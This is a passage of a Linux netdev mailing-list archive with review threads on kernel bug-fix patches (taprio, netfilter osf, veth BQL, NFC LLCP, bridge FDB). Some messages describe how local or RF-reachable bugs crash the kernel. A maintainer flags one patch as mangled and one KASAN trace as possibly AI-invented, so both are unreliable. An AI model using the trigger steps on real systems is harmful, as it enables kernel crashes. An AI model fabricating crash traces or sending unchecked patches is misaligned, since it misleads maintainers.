> > tc_dump_tclass_root (net/sched/sch_api.c:2370)
> > tc_dump_tclass (net/sched/sch_api.c:2431)
> > rtnl_dumpit (net/core/rtnetlink.c:6827)
> > netlink_dump (net/netlink/af_netlink.c:2325)
> > rtnetlink_rcv_msg (net/core/rtnetlink.c:6927)
> > netlink_rcv_skb (net/netlink/af_netlink.c:2550)
> > </TASK>
> >
> > Fix this by substituting &noop_qdisc when new is NULL in
> > taprio_graft(), following the same pattern used by multiq_graft() and
> > prio_graft(). This ensures q->qdiscs[] slots are never NULL, making
> > control-plane dump paths safe without requiring individual NULL checks.
> >
> > Also update the data-plane NULL guards in taprio_enqueue() and
> > taprio_dequeue_from_txq() to check for &noop_qdisc, so that packets
> > are still dropped cleanly without inflating qlen/backlog counters.
> >
> > Fixes: 665338b2a7a0 ("net/sched: taprio: dump class stats for the actual q->qdiscs[]")
> > Reported-by: Xiang Mei <xmei5@asu.edu>
> > Signed-off-by: Weiming Shi <bestswngs@gmail.com>
> > ---
> > v2:
> > - Update NULL checks in taprio_enqueue() and taprio_dequeue_from_txq()
> > to test for &noop_qdisc instead of NULL, preventing qlen/backlog
> > counter inflation when noop_qdisc drops packets (Sashiko)
> > ---
> > net/sched/sch_taprio.c | 11 +++++++----
> > 1 file changed, 7 insertions(+), 4 deletions(-)
> >
> > diff --git a/net/sched/sch_taprio.c b/net/sched/sch_taprio.c
> > index f721c03514f60..XXXXXXXXX 100644
> > --- a/net/sched/sch_taprio.c
> > +++ b/net/sched/sch_taprio.c
> > @@ -634,7 +634,7 @@ static int taprio_enqueue(struct sk_buff *skb, struct Qdisc *sch,
> >
> > child = q->qdiscs[queue];
> > - if (unlikely(!child))
> > + if (unlikely(child == &noop_qdisc))
> > return qdisc_drop(skb, sch, to_free);
> >
> > if (taprio_skb_exceeds_queue_max_sdu(sch, skb)) {
> > @@ -717,7 +717,7 @@ static struct sk_buff *taprio_dequeue_from_txq(struct Qdisc *sch, int txq,
> > int prio;
> > int len;
> > u8 tc;
> >
> > - if (unlikely(!child))
> > + if (unlikely(child == &noop_qdisc))
> > return NULL;
> >
> > if (TXTIME_ASSIST_IS_ENABLED(q->flags))
> > @@ -2183,6 +2183,9 @@ static int taprio_graft(struct Qdisc *sch, unsigned long cl,
> > if (!dev_queue)
> > return -EINVAL;
> >
> > + if (!new)
> > + new = &noop_qdisc;
> > +
> > if (dev->flags & IFF_UP)
> > dev_deactivate(dev);
> >
> > @@ -2196,14 +2199,14 @@ static int taprio_graft(struct Qdisc *sch, unsigned long cl,
> > *old = q->qdiscs[cl - 1];
> > if (FULL_OFFLOAD_IS_ENABLED(q->flags)) {
> > WARN_ON_ONCE(dev_graft_qdisc(dev_queue, new) != *old);
> > - if (new)
> > + if (new != &noop_qdisc)
> > qdisc_refcount_inc(new);
> > if (*old)
> > qdisc_put(*old);
> > }
> >
> > q->qdiscs[cl - 1] = new;
> > - if (new)
> > + if (new != &noop_qdisc)
> > new->flags |= TCQ_F_ONETXQUEUE | TCQ_F_NOPARENT;
> >
> > if (dev->flags & IFF_UP)
> > --
> > 2.43.0
>
> Does not apply cleanly to net and looks seriously mangled. I suspect the
> above chunks should be part of the actual patch ?!?
>
> Please, whatever tool you are using to help crafting the patch, double
> check the result manually before the actual submission.
>
> /P
>
Hi,
Sorry about the broken v2. I'll double-check everything carefully and
resend as v3.
Thanks,
Weiming
^ permalink raw reply
* Re: [PATCH] netfilter: nfnetlink_osf: fix null-ptr-deref in nf_osf_ttl
From: Pablo Neira Ayuso @ 2026-04-14 8:22 UTC (permalink / raw)
To: Kito Xu (veritas501)
Cc: Florian Westphal, Phil Sutter, David S. Miller, Eric Dumazet,
Jakub Kicinski, Paolo Abeni, Simon Horman,
Fernando Fernandez Mancera, netfilter-devel, coreteam, netdev,
linux-kernel
In-Reply-To: <20260414074556.2512750-1-hxzene@gmail.com>
Hi,
On Tue, Apr 14, 2026 at 03:45:56PM +0800, Kito Xu (veritas501) wrote:
> nf_osf_ttl() calls __in_dev_get_rcu(skb->dev) and passes the result
> to in_dev_for_each_ifa_rcu() without checking for NULL. When the
> receiving device has no IPv4 configuration (ip_ptr is NULL),
> __in_dev_get_rcu() returns NULL and in_dev_for_each_ifa_rcu()
> dereferences it unconditionally, causing a kernel crash.
How could skb->dev be NULL !?
This is run from prerouting, input and forward.
> This can happen when a packet arrives on a device that has had its
> IPv4 configuration removed (e.g., MTU set below IPV4_MIN_MTU causing
> inetdev_destroy) or on a device that was never assigned an IPv4
> address, while an xt_osf or nft_osf rule with TTL_LESS mode is
> active and the packet TTL exceeds the fingerprint TTL.
>
> Add a NULL check for in_dev before the iteration. When in_dev is
> NULL, return 0 (no match) since source-address locality cannot be
> determined without IPv4 addresses on the device.
>
> KASAN: null-ptr-deref in range
> [0x0000000000000010-0x0000000000000017]
> RIP: 0010:nf_osf_match_one+0x204/0xa70
I cannot believe this, I think AI is mocking KASAN splat, if that is
the case, I am sorry to say, but it is too bad if you are doing this.
> Call Trace:
> <IRQ>
> nf_osf_match+0x2f8/0x780
> xt_osf_match_packet+0x11c/0x1f0
> ipt_do_table+0x7fe/0x12b0
> nf_hook_slow+0xac/0x1e0
> ip_rcv+0x123/0x370
> __netif_receive_skb_one_core+0x166/0x1b0
> process_backlog+0x197/0x590
> __napi_poll+0xa1/0x540
> net_rx_action+0x401/0xd80
> handle_softirqs+0x19f/0x610
> </IRQ>
>
> Fixes: a218dc82f0b5 ("netfilter: nft_osf: Add ttl option support")
> Signed-off-by: Kito Xu (veritas501) <hxzene@gmail.com>
> ---
> net/netfilter/nfnetlink_osf.c | 3 +++
> 1 file changed, 3 insertions(+)
>
> diff --git a/net/netfilter/nfnetlink_osf.c b/net/netfilter/nfnetlink_osf.c
> index d64ce21c7b55..85dbd47dbbd4 100644
> --- a/net/netfilter/nfnetlink_osf.c
> +++ b/net/netfilter/nfnetlink_osf.c
> @@ -43,6 +43,9 @@ static inline int nf_osf_ttl(const struct sk_buff *skb,
> else if (ip->ttl <= f_ttl)
> return 1;
>
> + if (!in_dev)
> + return 0;
> +
> in_dev_for_each_ifa_rcu(ifa, in_dev) {
> if (inet_ifa_match(ip->saddr, ifa)) {
> ret = (ip->ttl == f_ttl);
> --
> 2.43.0
>
^ permalink raw reply
* Re: [syzbot ci] Re: veth: add Byte Queue Limits (BQL) support
From: Aleksandr Nogikh @ 2026-04-14 8:17 UTC (permalink / raw)
To: syzbot+cib904ea9ebb647254, hawk; +Cc: netdev, linux-kernel, syzkaller-bugs
In-Reply-To: <69dd48c2.a00a0220.468cb.004e.GAE@google.com>
Hmm, just fixed a problem that may have affected `syz test` processing,
let's try again:
#syz test
---
drivers/net/veth.c | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/drivers/net/veth.c b/drivers/net/veth.c
index 911e7e36e166..9d7b085c9548 100644
--- a/drivers/net/veth.c
+++ b/drivers/net/veth.c
@@ -1138,7 +1138,9 @@ static void veth_napi_del_range(struct net_device
*dev, int start, int end)
*/
peer = rtnl_dereference(priv->peer);
if (peer) {
- for (i = start; i < end; i++)
+ int peer_end = min(end, (int)peer->real_num_tx_queues);
+
+ for (i = start; i < peer_end; i++)
netdev_tx_reset_queue(netdev_get_tx_queue(peer, i));
}
^ permalink raw reply related
* Re: [PATCH net v2] net/sched: taprio: fix NULL pointer dereference in class dump
From: Paolo Abeni @ 2026-04-14 8:16 UTC (permalink / raw)
To: Weiming Shi, Vinicius Costa Gomes, Jamal Hadi Salim, Jiri Pirko,
David S . Miller, Eric Dumazet, Jakub Kicinski
Cc: Simon Horman, Vladimir Oltean, netdev, linux-kernel, Xiang Mei
In-Reply-To: <20260410153902.955227-2-bestswngs@gmail.com>
On 4/10/26 5:39 PM, Weiming Shi wrote:
> When a TAPRIO child qdisc is deleted via RTM_DELQDISC, taprio_graft()
> is called with new == NULL and stores NULL into q->qdiscs[cl - 1].
> Subsequent RTM_GETTCLASS dump operations walk all classes via
> taprio_walk() and call taprio_dump_class(), which calls taprio_leaf()
> returning the NULL pointer, then dereferences it to read child->handle,
> causing a kernel NULL pointer dereference.
>
> The bug is reachable with namespace-scoped CAP_NET_ADMIN on any kernel
> with CONFIG_NET_SCH_TAPRIO enabled. On systems with unprivileged user
> namespaces enabled, an unprivileged local user can trigger a kernel
> panic by creating a taprio qdisc inside a new network namespace,
> grafting an explicit child qdisc, deleting it, and requesting a class
> dump. The RTM_GETTCLASS dump itself requires no capability.
>
> Oops: general protection fault, probably for non-canonical address 0xdffffc0000000007: 0000 [#1] SMP KASAN NOPTI
> KASAN: null-ptr-deref in range [0x0000000000000038-0x000000000000003f]
> RIP: 0010:taprio_dump_class (net/sched/sch_taprio.c:2475)
> Call Trace:
> <TASK>
> tc_fill_tclass (net/sched/sch_api.c:1966)
> qdisc_class_dump (net/sched/sch_api.c:2329)
> taprio_walk (net/sched/sch_taprio.c:2510)
> tc_dump_tclass_qdisc (net/sched/sch_api.c:2353)
> tc_dump_tclass_root (net/sched/sch_api.c:2370)
> tc_dump_tclass (net/sched/sch_api.c:2431)
> rtnl_dumpit (net/core/rtnetlink.c:6827)
> netlink_dump (net/netlink/af_netlink.c:2325)
> rtnetlink_rcv_msg (net/core/rtnetlink.c:6927)
> netlink_rcv_skb (net/netlink/af_netlink.c:2550)
> </TASK>
>
> Fix this by substituting &noop_qdisc when new is NULL in
> taprio_graft(), following the same pattern used by multiq_graft() and
> prio_graft(). This ensures q->qdiscs[] slots are never NULL, making
> control-plane dump paths safe without requiring individual NULL checks.
>
> Also update the data-plane NULL guards in taprio_enqueue() and
> taprio_dequeue_from_txq() to check for &noop_qdisc, so that packets
> are still dropped cleanly without inflating qlen/backlog counters.
>
> Fixes: 665338b2a7a0 ("net/sched: taprio: dump class stats for the actual q->qdiscs[]")
> Reported-by: Xiang Mei <xmei5@asu.edu>
> Signed-off-by: Weiming Shi <bestswngs@gmail.com>
> ---
> v2:
> - Update NULL checks in taprio_enqueue() and taprio_dequeue_from_txq()
> to test for &noop_qdisc instead of NULL, preventing qlen/backlog
> counter inflation when noop_qdisc drops packets (Sashiko)
> ---
> net/sched/sch_taprio.c | 11 +++++++----
> 1 file changed, 7 insertions(+), 4 deletions(-)
>
> diff --git a/net/sched/sch_taprio.c b/net/sched/sch_taprio.c
> index f721c03514f60..XXXXXXXXX 100644
> --- a/net/sched/sch_taprio.c
> +++ b/net/sched/sch_taprio.c
> @@ -634,7 +634,7 @@ static int taprio_enqueue(struct sk_buff *skb, struct Qdisc *sch,
>
> child = q->qdiscs[queue];
> - if (unlikely(!child))
> + if (unlikely(child == &noop_qdisc))
> return qdisc_drop(skb, sch, to_free);
>
> if (taprio_skb_exceeds_queue_max_sdu(sch, skb)) {
> @@ -717,7 +717,7 @@ static struct sk_buff *taprio_dequeue_from_txq(struct Qdisc *sch, int txq,
> int prio;
> int len;
> u8 tc;
>
> - if (unlikely(!child))
> + if (unlikely(child == &noop_qdisc))
> return NULL;
>
> if (TXTIME_ASSIST_IS_ENABLED(q->flags))
> @@ -2183,6 +2183,9 @@ static int taprio_graft(struct Qdisc *sch, unsigned long cl,
> if (!dev_queue)
> return -EINVAL;
>
> + if (!new)
> + new = &noop_qdisc;
> +
> if (dev->flags & IFF_UP)
> dev_deactivate(dev);
>
> @@ -2196,14 +2199,14 @@ static int taprio_graft(struct Qdisc *sch, unsigned long cl,
> *old = q->qdiscs[cl - 1];
> if (FULL_OFFLOAD_IS_ENABLED(q->flags)) {
> WARN_ON_ONCE(dev_graft_qdisc(dev_queue, new) != *old);
> - if (new)
> + if (new != &noop_qdisc)
> qdisc_refcount_inc(new);
> if (*old)
> qdisc_put(*old);
> }
>
> q->qdiscs[cl - 1] = new;
> - if (new)
> + if (new != &noop_qdisc)
> new->flags |= TCQ_F_ONETXQUEUE | TCQ_F_NOPARENT;
>
> if (dev->flags & IFF_UP)
> --
> 2.43.0
Does not apply cleanly to net and looks seriously mangled. I suspect the
above chunks should be part of the actual patch ?!?
Please, whatever tool you are using to help crafting the patch, double
check the result manually before the actual submission.
/P
^ permalink raw reply
* Re: [PATCH net 0/3] nfc: llcp: fix OOB reads in TLV parsers and PDU handlers
From: Paolo Abeni @ 2026-04-14 8:11 UTC (permalink / raw)
To: Lekë Hapçiu, netdev; +Cc: linux-nfc, stable, davem, edumazet, kuba
In-Reply-To: <20260409233517.1891497-1-snowwlake@icloud.com>
On 4/10/26 1:35 AM, Lekë Hapçiu wrote:
> This series fixes three out-of-bounds read vulnerabilities in the NFC
> LLCP layer, all reachable from RF without prior pairing or session
> establishment.
>
> Patch 1 adds missing TLV length bounds checks in nfc_llcp_parse_gb_tlv()
> and nfc_llcp_parse_connection_tlv() — a crafted CONNECT or SNL PDU
> containing a short TLV value field can read beyond the skb tail.
>
> Patch 2 fixes nfc_llcp_recv_snl(), which accessed TLV fields and
> performed arithmetic on an uncapped length byte before any bounds
> check, enabling a 1-byte heap OOB read and a u8 wrap-around.
>
> Patch 3 fixes nfc_llcp_recv_dm(), which read the DM reason byte at
> skb->data[2] without verifying the frame is at least 3 bytes long.
> A 2-byte DM PDU (header only) from a rogue peer triggers a 1-byte
> OOB heap read.
>
> All three bugs are independently triggered via RF (AV:A, AC:L, no
> authentication required).
This series looks like an older iteration of:
https://patchwork.kernel.org/user/todo/netdevbpf/?series=1079400
but it reached the ML 2h afterwards?!?
At very best you have some serious setup issue. Please have a look at
the repost policy and especially at the 24h grace period:
https://elixir.bootlin.com/linux/v7.0/source/Documentation/process/maintainer-netdev.rst
And, given the above problem, please do not share any more patches for
at least 48h.
/P
^ permalink raw reply
* Re: [PATCH net-next] MAINTAINERS: Add netkit selftest files
From: Nikolay Aleksandrov @ 2026-04-14 8:11 UTC (permalink / raw)
To: Daniel Borkmann, netdev; +Cc: kuba, dw, pabeni
In-Reply-To: <20260414075249.611608-1-daniel@iogearbox.net>
On 14/04/2026 10:52, Daniel Borkmann wrote:
> The following selftest files are related to netkit and should have
> netkit folks in Cc for review:
>
> - tools/testing/selftests/bpf/prog_tests/tc_netkit.c
> - tools/testing/selftests/drivers/net/hw/nk_qlease.py
> - tools/testing/selftests/net/nk_qlease.py
>
> Signed-off-by: Daniel Borkmann <daniel@iogearbox.net>
> ---
> [ on top of https://lore.kernel.org/netdev/20260413220809.604592-1-daniel@iogearbox.net/ ]
>
> MAINTAINERS | 3 +++
> 1 file changed, 3 insertions(+)
>
> diff --git a/MAINTAINERS b/MAINTAINERS
> index 65902b97f5df..fa1bdb1db73e 100644
> --- a/MAINTAINERS
> +++ b/MAINTAINERS
> @@ -4901,6 +4901,9 @@ L: netdev@vger.kernel.org
> S: Supported
> F: drivers/net/netkit.c
> F: include/net/netkit.h
> +F: tools/testing/selftests/bpf/prog_tests/tc_netkit.c
> +F: tools/testing/selftests/drivers/net/hw/nk_qlease.py
> +F: tools/testing/selftests/net/nk_qlease.py
>
> BPF [NETWORKING] (struct_ops, reuseport)
> M: Martin KaFai Lau <martin.lau@linux.dev>
Reviewed-by: Nikolay Aleksandrov <razor@blackwall.org>
^ permalink raw reply
* Re: Re: [syzbot ci] Re: veth: add Byte Queue Limits (BQL) support
From: syzbot ci @ 2026-04-14 8:08 UTC (permalink / raw)
To: hawk
Cc: andrew, ast, bpf, corbet, daniel, davem, edumazet, frederic, hawk,
horms, j.koeppeler, john.fastabend, kernel-team, kuba, linux-doc,
linux-kernel, linux-kselftest, netdev, pabeni, sdf, shuah, syzbot,
syzkaller-bugs
In-Reply-To: <41689f2e-8786-49a6-912d-f65e48245a61@kernel.org>
Please attach the patch to act upon.
^ permalink raw reply
* Re: [syzbot ci] Re: veth: add Byte Queue Limits (BQL) support
From: Jesper Dangaard Brouer @ 2026-04-14 8:06 UTC (permalink / raw)
To: syzbot ci, andrew, ast, bpf, corbet, daniel, davem, edumazet,
frederic, horms, j.koeppeler, john.fastabend, kernel-team, kuba,
linux-doc, linux-kernel, linux-kselftest, netdev, pabeni, sdf,
shuah
Cc: syzbot, syzkaller-bugs
In-Reply-To: <69dd48c2.a00a0220.468cb.004e.GAE@google.com>
[-- Attachment #1: Type: text/plain, Size: 4594 bytes --]
On 13/04/2026 21.49, syzbot ci wrote:
> syzbot ci has tested the following series
>
> [v2] veth: add Byte Queue Limits (BQL) support
> https://lore.kernel.org/all/20260413094442.1376022-1-hawk@kernel.org
> * [PATCH net-next v2 1/5] net: add dev->bql flag to allow BQL sysfs for IFF_NO_QUEUE devices
> * [PATCH net-next v2 2/5] veth: implement Byte Queue Limits (BQL) for latency reduction
> * [PATCH net-next v2 3/5] veth: add tx_timeout watchdog as BQL safety net
> * [PATCH net-next v2 4/5] net: sched: add timeout count to NETDEV WATCHDOG message
> * [PATCH net-next v2 5/5] selftests: net: add veth BQL stress test
>
> and found the following issue:
> WARNING in veth_napi_del_range
>
> Full report is available here:
> https://ci.syzbot.org/series/ee732006-8545-4abd-a105-b4b1592a7baf
>
> ***
>
> WARNING in veth_napi_del_range
>
Attached a reproducer myself.
- I have V3 ready see below for diff
> tree: net-next
> URL: https://kernel.googlesource.com/pub/scm/linux/kernel/git/netdev/net-next.git
> base: 8806d502e0a7e7d895b74afbd24e8550a65a2b17
> arch: amd64
> compiler: Debian clang version 21.1.8 (++20251221033036+2078da43e25a-1~exp1~20251221153213.50), Debian LLD 21.1.8
> config: https://ci.syzbot.org/builds/90743a26-f003-44cf-abcc-5991c47588b2/config
> syz repro: https://ci.syzbot.org/findings/d068bfb2-9f8b-466a-95b4-cd7e7b00006c/syz_repro
>
> ------------[ cut here ]------------
> index >= dev->num_tx_queues
> WARNING: ./include/linux/netdevice.h:2672 at netdev_get_tx_queue include/linux/netdevice.h:2672 [inline], CPU#0: syz.1.27/6002
> WARNING: ./include/linux/netdevice.h:2672 at veth_napi_del_range+0x3b7/0x4e0 drivers/net/veth.c:1142, CPU#0: syz.1.27/6002
> Modules linked in:
> CPU: 0 UID: 0 PID: 6002 Comm: syz.1.27 Not tainted syzkaller #0 PREEMPT(full)
> Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
> RIP: 0010:netdev_get_tx_queue include/linux/netdevice.h:2672 [inline]
> RIP: 0010:veth_napi_del_range+0x3b7/0x4e0 drivers/net/veth.c:1142
> Code: 00 e8 ad 96 69 fe 44 39 6c 24 10 74 5e e8 41 61 44 fb 41 ff c5 49 bc 00 00 00 00 00 fc ff df e9 6d ff ff ff e8 2a 61 44 fb 90 <0f> 0b 90 42 80 3c 23 00 75 8e eb 94 48 8b 0c 24 80 e1 07 80 c1 03
> RSP: 0018:ffffc90003adf918 EFLAGS: 00010293
> RAX: ffffffff86814ec6 RBX: 1ffff110227a6c03 RCX: ffff888103a857c0
> RDX: 0000000000000000 RSI: 0000000000000002 RDI: 0000000000000002
> RBP: 1ffff110227a6c9a R08: ffff888113f01ab7 R09: 0000000000000000
> R10: ffff888113f01a98 R11: ffffed10227e0357 R12: dffffc0000000000
> R13: 0000000000000002 R14: 0000000000000002 R15: ffff888113d36018
> FS: 000055555ea16500(0000) GS:ffff88818de4a000(0000) knlGS:0000000000000000
> CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> CR2: 00007efc287456b8 CR3: 000000010cdd0000 CR4: 00000000000006f0
> Call Trace:
> <TASK>
> veth_napi_del drivers/net/veth.c:1153 [inline]
> veth_disable_xdp+0x1b0/0x310 drivers/net/veth.c:1255
> veth_xdp_set drivers/net/veth.c:1693 [inline]
> veth_xdp+0x48e/0x730 drivers/net/veth.c:1717
> dev_xdp_propagate+0x125/0x260 net/core/dev_api.c:348
> bond_xdp_set drivers/net/bonding/bond_main.c:5715 [inline]
> bond_xdp+0x3ca/0x830 drivers/net/bonding/bond_main.c:5761
> dev_xdp_install+0x42c/0x600 net/core/dev.c:10387
> dev_xdp_detach_link net/core/dev.c:10579 [inline]
> bpf_xdp_link_release+0x362/0x540 net/core/dev.c:10595
> bpf_link_free+0x103/0x480 kernel/bpf/syscall.c:3292
> bpf_link_put_direct kernel/bpf/syscall.c:3344 [inline]
> bpf_link_release+0x6b/0x80 kernel/bpf/syscall.c:3351
> __fput+0x44f/0xa70 fs/file_table.c:469
> task_work_run+0x1d9/0x270 kernel/task_work.c:233
The BQL reset loop in veth_napi_del_range() iterates
dev->real_num_rx_queues but indexes into peer's TX queues,
which goes out of bounds when the peer has fewer TX queues
(e.g. veth enslaved to a bond with XDP).
Fix is to clamp the loop to the peer's real_num_tx_queues.
Will be included in the V3 submission.
#syz test
---
drivers/net/veth.c | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/drivers/net/veth.c b/drivers/net/veth.c
index 911e7e36e166..9d7b085c9548 100644
--- a/drivers/net/veth.c
+++ b/drivers/net/veth.c
@@ -1138,7 +1138,9 @@ static void veth_napi_del_range(struct net_device
*dev, int start, int end)
*/
peer = rtnl_dereference(priv->peer);
if (peer) {
- for (i = start; i < end; i++)
+ int peer_end = min(end, (int)peer->real_num_tx_queues);
+
+ for (i = start; i < peer_end; i++)
netdev_tx_reset_queue(netdev_get_tx_queue(peer, i));
}
[-- Attachment #2: repro-syzbot-veth-bql.sh --]
[-- Type: application/x-shellscript, Size: 2967 bytes --]
^ permalink raw reply related
* Re: [PATCH net 1/1] net: bridge: use a stable FDB dst snapshot in RCU readers
From: Ido Schimmel @ 2026-04-14 8:05 UTC (permalink / raw)
To: Ren Wei
Cc: bridge, netdev, razor, davem, edumazet, kuba, pabeni, horms,
makita.toshiaki, vyasevic, yifanwucs, tomapufckgml, yuantan098,
bird, enjou1224z, zcliangcn
In-Reply-To: <6570fabb85ecadb8baaf019efe856f407711c7b9.1776043229.git.zcliangcn@gmail.com>
On Mon, Apr 13, 2026 at 05:08:46PM +0800, Ren Wei wrote:
> From: Zhengchuan Liang <zcliangcn@gmail.com>
>
> Local FDB entries can be rewritten in place by `fdb_delete_local()`, which
> updates `f->dst` to another port or to `NULL` while keeping the entry
> alive. Several bridge RCU readers inspect `f->dst`, including
> `br_fdb_fillbuf()` through the `brforward_read()` sysfs path.
>
> These readers currently load `f->dst` multiple times and can therefore
> observe inconsistent values across the check and later dereference.
> In `br_fdb_fillbuf()`, this means a concurrent local-FDB update can change
> `f->dst` after the NULL check and before the `port_no` dereference,
> leading to a NULL-ptr-deref.
>
> Fix this by taking a single `READ_ONCE()` snapshot of `f->dst` in each
> affected RCU reader and using that snapshot for the rest of the access
> sequence. Also publish the in-place `f->dst` updates in `fdb_delete_local()`
> with `WRITE_ONCE()` so the readers and writer use matching access patterns.
Sashiko is complaining [1] about missing READ_ONCE() annotations in some
places, but I can handle them in net-next in a similar fashion to commit
3e19ae7c6fd6 ("net: bridge: use READ_ONCE() and WRITE_ONCE() compiler
barriers for fdb->dst").
It's also complaining [2] about a not very interesting possible bug in
br_fdb_dump() which is pre-existing.
>
> Fixes: 960b589f86c7 ("bridge: Properly check if local fdb entry can be deleted in br_fdb_change_mac_address")
> Cc: stable@kernel.org
> Reported-by: Yifan Wu <yifanwucs@gmail.com>
> Reported-by: Juefei Pu <tomapufckgml@gmail.com>
> Co-developed-by: Yuan Tan <yuantan098@gmail.com>
> Signed-off-by: Yuan Tan <yuantan098@gmail.com>
> Suggested-by: Xin Liu <bird@lzu.edu.cn>
> Tested-by: Ren Wei <enjou1224z@gmail.com>
> Signed-off-by: Zhengchuan Liang <zcliangcn@gmail.com>
> Signed-off-by: Ren Wei <n05ec@lzu.edu.cn>
Reviewed-by: Ido Schimmel <idosch@nvidia.com>
[1]
"
Are there other RCU readers that still need this protection?
For instance, in br_dev_xmit(), br_fdb_find_rcu() returns a local FDB entry
which is then passed to br_forward(). If a concurrent fdb_delete_local()
sets the entry's dst to NULL, could this cause a NULL pointer dereference if
br_forward() is inlined and the compiler emits multiple loads?
Similarly, br_handle_frame_finish() appears to perform an unmarked read of
dst->dst, which might race with br_fdb_update().
Also, in br_fdb_delete_by_port(), f->dst is read directly without
READ_ONCE(). While called under br->hash_lock, the br_fdb_update()
fast path updates f->dst locklessly. Could this trigger KCSAN warnings due
to an unmarked data race?
"
[2]
"
Does passing f to fdb_fill_info() allow a concurrent update to change
the destination port after the filtering check?
fdb_fill_info() executes a new READ_ONCE(fdb->dst). If f->dst changes
between the filter_dev check above and the call to fdb_fill_info(), the
dumped entry might claim to be on a device that doesn't match the requested
filter_dev.
Should fdb_fill_info() be updated to accept the dst snapshot instead?
"
^ permalink raw reply
* Re: [PATCH net v2 1/3] nfc: nci: fix u8 underflow in nci_store_general_bytes_nfc_dep
From: Paolo Abeni @ 2026-04-14 8:04 UTC (permalink / raw)
To: Lekë Hapçiu, netdev
Cc: davem, edumazet, kuba, linux-nfc, stable, horms,
Lekë Hapçiu
In-Reply-To: <5a6a95f0-a26c-4eed-9c9a-98e22c3bc682@redhat.com>
On 4/14/26 9:34 AM, Paolo Abeni wrote:
> On 4/9/26 8:59 PM, Lekë Hapçiu wrote:
>> From: Lekë Hapçiu <framemain@outlook.com>
>>
>> nci_store_general_bytes_nfc_dep() computes the number of General Bytes
>> to copy from an ATR_RES or ATR_REQ frame by subtracting a fixed header
>> offset from the peer-supplied length field:
>>
>> ndev->remote_gb_len = min_t(__u8,
>> (atr_res_len - NFC_ATR_RES_GT_OFFSET), /* offset = 15 */
>> NFC_ATR_RES_GB_MAXSIZE);
>>
>> Both length fields are __u8. When a malicious NFC-DEP target (POLL mode)
>> or initiator (LISTEN mode) sends an ATR_RES/ATR_REQ whose length field is
>> smaller than the fixed offset (< 15 or < 14 respectively), the subtraction
>> wraps in unsigned u8 arithmetic:
>>
>> e.g. atr_res_len = 0 -> (u8)(0 - 15) = 241
>>
>> min_t(__u8, 241, 47) then yields 47, so the subsequent memcpy reads
>> 47 bytes from beyond the end of the valid activation parameter data into
>> ndev->remote_gb[]. This buffer is later passed to nfc_llcp_parse_gb_tlv()
>> as a TLV array, feeding directly into the TLV parser hardened by the
>> companion patch.
>>
>> Fix: add an explicit lower-bound check on each length field before the
>> subtraction. If the length is smaller than the required offset the frame
>> is malformed; leave remote_gb_len at zero and skip the memcpy.
>>
>> Both the POLL (atr_res_len / NFC_ATR_RES_GT_OFFSET = 15) and the LISTEN
>> (atr_req_len / NFC_ATR_REQ_GT_OFFSET = 14) paths are affected; both are
>> fixed symmetrically.
>>
>> Reachability: the ATR_RES is sent by an NFC-DEP target during RF
>> activation, before any authentication or pairing. The bug is therefore
>> reachable from any NFC peer within ~4 cm.
>>
>> Fixes: a99903ec4566 ("NFC: NCI: Handle Target mode activation")
>> Cc: stable@vger.kernel.org
>> Signed-off-by: Lekë Hapçiu <framemain@outlook.com>
>> ---
>> net/nfc/nci/ntf.c | 22 ++++++++++++++--------
>> 1 file changed, 14 insertions(+), 8 deletions(-)
>>
>> diff --git a/net/nfc/nci/ntf.c b/net/nfc/nci/ntf.c
>> index c96512bb8..8eb295580 100644
>> --- a/net/nfc/nci/ntf.c
>> +++ b/net/nfc/nci/ntf.c
>> @@ -631,25 +631,31 @@ static int nci_store_general_bytes_nfc_dep(struct nci_dev *ndev,
>> switch (ntf->activation_rf_tech_and_mode) {
>> case NCI_NFC_A_PASSIVE_POLL_MODE:
>> case NCI_NFC_F_PASSIVE_POLL_MODE:
>> + if (ntf->activation_params.poll_nfc_dep.atr_res_len <
>> + NFC_ATR_RES_GT_OFFSET)
>> + break;
>
> This does not look the right fix: nci_store_general_bytes_nfc_dep() will
> return success to the caller, and processing will proceed even if the
> packet is malformed.
>
> Looking at the (rather incomplete) error handling in
> nci_rf_intf_activated_ntf_packet(), the latter function should error out
> with EINVAL for truncated/malformed packets.
>
> You should return a proper error code here _and_ handle such error in
> nci_rf_intf_activated_ntf_packet().
>
> The same comment applies to the simlar check below.
>
>> ndev->remote_gb_len = min_t(__u8,
>> - (ntf->activation_params.poll_nfc_dep.atr_res_len
>> - - NFC_ATR_RES_GT_OFFSET),
>> + ntf->activation_params.poll_nfc_dep.atr_res_len
>> + - NFC_ATR_RES_GT_OFFSET,
>
> Please do not include style-related changes in 'net' fix: it should
> include the minimal delta to address the issue.
>
> Other similar chuncks below.
I almost forgot: do not send you patches in reply to older revision: it
will foul patchwork and make the review process harder, if possible at all.
/P
^ permalink raw reply
* Re: [PATCH net v2 3/3] nfc: llcp: fix TLV parsing OOB and length underflow in nfc_llcp_recv_snl
From: Paolo Abeni @ 2026-04-14 8:02 UTC (permalink / raw)
To: Lekë Hapçiu, netdev
Cc: davem, edumazet, kuba, linux-nfc, stable, horms,
Lekë Hapçiu
In-Reply-To: <20260409185958.1821242-4-snowwlake@icloud.com>
On 4/9/26 8:59 PM, Lekë Hapçiu wrote:
> @@ -1300,11 +1305,17 @@ static void nfc_llcp_recv_snl(struct nfc_llcp_local *local,
> sdres_tlvs_len = 0;
>
> while (offset < tlv_len) {
> + if (tlv_len - offset < 2)
> + break;
> type = tlv[0];
> length = tlv[1];
> + if (tlv_len - offset - 2 < length)
> + break;
>
> switch (type) {
> case LLCP_TLV_SDREQ:
> + if (length < 1)
> + break;
> tid = tlv[2];
> service_name = (char *) &tlv[3];
Sashiko noted that you are validating a single additional byte, but the
code reads 2 of them.
/P
^ permalink raw reply
* Re: [Intel-wired-lan] [PATCH net] idpf: fix double free and use-after-free in aux device error paths
From: Greg Kroah-Hartman @ 2026-04-14 8:00 UTC (permalink / raw)
To: Paul Menzel
Cc: intel-wired-lan, netdev, linux-kernel, Tony Nguyen,
Przemek Kitszel, Andrew Lunn, David S. Miller, Eric Dumazet,
Jakub Kicinski, Paolo Abeni, stable
In-Reply-To: <afefe8b5-5bd9-4019-9d12-5ee2a7f577a2@molgen.mpg.de>
On Tue, Apr 14, 2026 at 08:54:55AM +0200, Paul Menzel wrote:
> Dear Greg,
>
>
> Thank you for the patch.
>
